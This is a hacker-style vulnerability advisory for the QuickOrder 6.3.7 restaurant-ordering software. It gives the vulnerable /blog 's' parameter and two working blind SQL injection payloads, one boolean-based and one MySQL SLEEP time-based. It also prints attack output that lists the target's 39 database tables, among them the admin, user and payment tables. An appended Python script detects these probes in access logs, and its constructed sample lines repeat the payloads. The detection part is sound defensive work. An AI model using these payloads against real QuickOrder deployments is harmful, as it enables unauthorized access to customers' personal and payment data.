QuickOrder 6.3.7 SQL Injection
QuickOrder version 6.3.7 suffers from a remote SQL injection vulnerability.
CraCkEr - THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : https://quickorder.by-code.com
Vendor    : bylancer
Software  : QuickOrder 6.3.7
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data and modification of data, and can crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /blog

https://website/blog?s=[SQLI]

GET parameter 's' is vulnerable to SQL Injection

---
Parameter: s (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: s=1') OR 02445=2445 OR ('04586'='4586

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---

[+] Starting the Attack

fetching current database
current database: 'quickordercode_**'

fetching tables
[39 tables]
+-------------------------+
| qr_orders               |
| qr_order_items          |
| qr_blog_comment         |
| qr_payments             |
| qr_menu_variants        |
| qr_options              |
| qr_time_zones           |
| qr_countries            |
| qr_restaurant           |
| qr_blog_categories      |
| qr_logs                 |
| qr_image_menu           |
| qr_balance              |
| qr_blog                 |
| qr_menu                 |
| qr_user                 |
| qr_pages                |
| qr_menu_extras          |
| qr_taxes                |
| qr_upgrades             |
| qr_usergroups           |
| qr_faq_entries          |
| qr_transaction          |
| qr_restaurant_options   |
| qr_languages            |
| qr_admins               |
| qr_allergies            |
| qr_user_options         |
| qr_order_item_extras    |
| qr_subscriptions        |
| qr_menu_variant_options |
| qr_plans                |
| qr_testimonials         |
| qr_plan_options         |
| qr_catagory_main        |
| qr_currencies           |
| qr_restaurant_view      |
| qr_waiter_call          |
| qr_blog_cat_relation    |
+-------------------------+

[-] Done
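The advisory reports two blind injection techniques against the `s` parameter of `/blog`: a boolean tautology (`OR n=n`) and a MySQL `SLEEP()` delay wrapped in `IF()`. Both leave a recognisable shape in web-server access logs, which is where a defender running QuickOrder would look for exploitation attempts while waiting on a vendor fix. The script below is an added example (not part of the advisory and not QuickOrder's own code) that parses Common Log Format lines, URL-decodes the `s` value of `/blog` requests, and flags the indicator classes above. The log lines, IP addresses and timestamps are constructed for the example; the `/blog` path and `s` parameter name come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (Common Log Format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2023:10:00:01 +0000] "GET /blog?s=pasta HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2023:10:00:02 +0000] "GET /blog?s=1%27%29+OR+1234%3D1234+OR+%28%27a%27%3D%27a HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2023:10:00:09 +0000] "GET /blog?s=1%27XOR%28IF%28now%28%29%3Dsysdate%28%29%2CSLEEP%286%29%2C0%29%29XOR%27Z HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2023:10:01:00 +0000] "GET /blog?s=chicken+sandwich HTTP/1.1" 200 4096
"""

# Minimal CLF parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicator classes keyed to the techniques named in the advisory.
PATTERNS = {
    # quote/paren closing the literal, then OR/AND and an x=x comparison
    "boolean_tautology": re.compile(
        r"['\")]\s*(OR|AND)\s*\(?\s*(\d+|'[^']*')\s*=\s*(\d+|'[^']*')", re.I
    ),
    # MySQL delay primitives used by time-based blind probes
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    # SQL comment markers, common as payload terminators
    "sql_comment": re.compile(r"(--|#|/\*)"),
}

VULN_PATH = "/blog"   # from the advisory
VULN_PARAM = "s"      # from the advisory


def extract_search_param(target):
    """Return the decoded 's' value for a /blog request, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into spaces for us
    values = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM)
    return values[0] if values else None


def classify(value):
    """Names of every indicator class that matches the decoded value."""
    return [name for name, rx in PATTERNS.items() if rx.search(value)]


def scan_log(text):
    """Yield one finding per log line whose /blog?s= value looks like an injection probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the scan
        value = extract_search_param(m.group("target"))
        if value is None:
            continue
        hits = classify(value)
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "value": value,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['indicators']} s={f['value']!r}")
```

Run against the sample, the two probe lines are flagged (one as `boolean_tautology`, one as `time_based`) while the ordinary searches pass. A real deployment would feed the access log through `scan_log` and alert on repeated hits from one client; the regexes are deliberately narrow to keep false positives on legitimate search strings low, so treat them as a starting point rather than a complete signature set.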